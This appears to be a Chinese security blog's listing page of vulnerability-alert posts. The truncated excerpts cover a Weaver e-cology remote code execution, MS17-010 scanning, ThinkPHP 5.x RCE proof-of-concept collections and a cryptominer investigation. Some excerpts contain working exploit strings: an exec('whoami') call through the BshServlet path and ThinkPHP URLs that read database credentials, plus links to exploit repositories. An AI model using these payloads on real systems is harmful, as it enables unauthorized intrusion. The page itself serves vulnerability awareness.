漏洞预警

搜索当前分类

搜索

泛微协同OA管理平台(e-cology)远程代码执行漏洞

lsh4ck 5年前 1,311 0

访问：weaver/bsh.servlet.BshServlet 执行：exec("whoami");

那年MS17-010 2

lsh4ck 6年前 3,002 0

扫描脚本汇总 PHP脚本： 批量扫描： https://github.com/lsh4ck/ms17-010-m4ss-sc4nn3r MSF的： 或者也可以： smb_ms17_010.rb缺省只扫445/TCP。如果想扫139/TCP，必须: set SMBDirect fa...

2018年十大远程漏洞利用

lsh4ck 6年前 817 0

CVE-2018-15473 OpenSSH User Enum Exploit CVE-2018-15473 https://github.com/Rhynorater/CVE-2018-15473-Exploit CVE-2018-10933 libSSH Auth Bypa...

thinkphp v5.x 远程代码执行漏洞-POC集合

lsh4ck 6年前 3,829 2

thinkphp 5.0.22 http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username http://192.168.1.1/thinkphp/public/?s=.|...

ThinkPHP 5.0 * 远程代码执行漏洞分析报告 43

lsh4ck 6年前 319 1

本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 ...

用shell对指定站点进行简单的实时入侵预警

lsh4ck 6年前 209 0

门罗币追查 17

lsh4ck 6年前 676 0

发现历程： 领导反映公司跳板机到达一台内网机cpu暴涨 上机查看： 除了正常项目之外有一个项目下普通用户起的bash进程 cpu占用简直可怕。 据经验发现加密字符串意思网络山寨币的电子钱包形式，取字符串“stratum+tcp://3565235355:443”百度后发现： 确凿...

thinkphp5框架缺陷导致远程代码执行

lsh4ck 6年前 1,068 0

近日thinkphp团队发布了版本更新https://blog.thinkphp.cn/869075，其中修复了一处getshell漏洞。 官网论坛随即放出神级求助帖【求助！thinkphp5.0.9执行系统代码漏洞】 影响版本 ThinkPHP 5.x < 5.1.31，...